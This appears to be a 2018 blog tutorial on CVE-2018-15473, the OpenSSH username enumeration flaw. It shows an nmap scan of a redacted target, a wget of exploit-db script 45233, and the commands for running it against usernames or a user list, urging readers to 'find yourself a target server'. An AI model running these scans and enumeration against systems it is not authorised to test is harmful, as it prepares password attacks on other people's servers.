Enumerating Usernames on SSH servers (<7.7), CVE-2018-15473

by hash3liZer . 26 August 2018

Enumerating Usernames on SSH servers (<7.7), CVE-2018-15473

A small defect in OpenSSH server was recently exposed by researchers where they were able to enumerate the registered usernames on the server by exploiting the way the server behaves on forged requests. As of a username that doesn't exist the server would respond with an authentication failure while in the case the user exists, the scenario would be different. This little misconfiguration leads to the username enumeration and all OpenSSH versions prior to 7.7 are vulnerable.

Tough the patch has been released but as of the large audience, this could take at least months to settle down everything back to normal. What can an attacker do is simply compile a list and perform a mass-enumeration attack on the server and with the help with enumerated usernames, similar proceedings can be done for the password too.

The vulnerability is assigned the ID: CVE-2018-15473. So, we gonna test a server has OpenSSH installed.

There are so many usernames that could be enumerated. Moreover, it could also be helpful in finding some peculiarities that could only be suitable for certain environments.

Let's better be get going:

Target

Find yourself a target server. Do a port scan and look for any OpenSSH services available prior to version 7.7. I've already one and to hide the identity, I'll be using the name redacted.com instead of the real domain. Here's what I got from the nmap scan:

$ nmap -sS -sV -O redacted.com
redacted

STEP 2

Get the exploit.

The exploit is available on exploit-db under the id 45233 written by Justin Gardner.

$ wget https://www.exploit-db.com/download/45233.py
45233

STEP 3

Fire the script:

$ python 45233.py --port [port] --username [username] redacted.com
# OR in case of a list
$ python 45233.py --port [port] --userList [/path/to/file] --threads 10 redacted.com

In our case, we got:

$ python 45233.py --port 2222 --username root redacted.com
45233.py

Conclusion

Be alerted and always try to keep all of your applications up to date.